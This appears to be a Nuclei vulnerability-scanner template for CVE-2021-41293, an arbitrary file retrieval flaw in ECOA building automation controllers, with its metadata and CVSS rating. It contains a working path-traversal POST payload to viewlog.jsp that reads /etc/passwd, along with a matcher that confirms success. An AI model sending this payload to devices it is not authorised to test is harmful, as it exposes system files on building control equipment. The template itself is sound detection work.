nuclei-templates/http/cves/2021/CVE-2021-41293.yaml

41 lines
1.2 KiB
YAML
Raw Normal View History

2021-10-14 14:35:25 +00:00
id: CVE-2021-41293
info:
name: ECOA Building Automation System - Arbitrary File Retrieval
author: 0x_Akoko
severity: high
description: The ECOA BAS controller suffers from an arbitrary file disclosure vulnerability. Using the 'fname' POST parameter in viewlog.jsp, attackers can disclose arbitrary files on the affected device and disclose sensitive and system information.
2021-10-14 13:30:44 +00:00
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2021-41293
2021-10-14 13:30:44 +00:00
- https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5679.php
- https://www.twcert.org.tw/tw/cp-132-5129-7e623-1.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2021-41293
cwe-id: CWE-22
cpe: cpe:2.3:a:ecoa:riskterminator:*:*:*:*:*:*:*:*
epss-score: 0.09404
tags: cve,cve2021,ecoa,lfi,disclosure
http:
- raw:
- |
POST /viewlog.jsp HTTP/1.1
Host: {{Hostname}}
yr=2021&mh=6&fname=../../../../../../../../etc/passwd
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# Enhanced by mp on 2022/03/07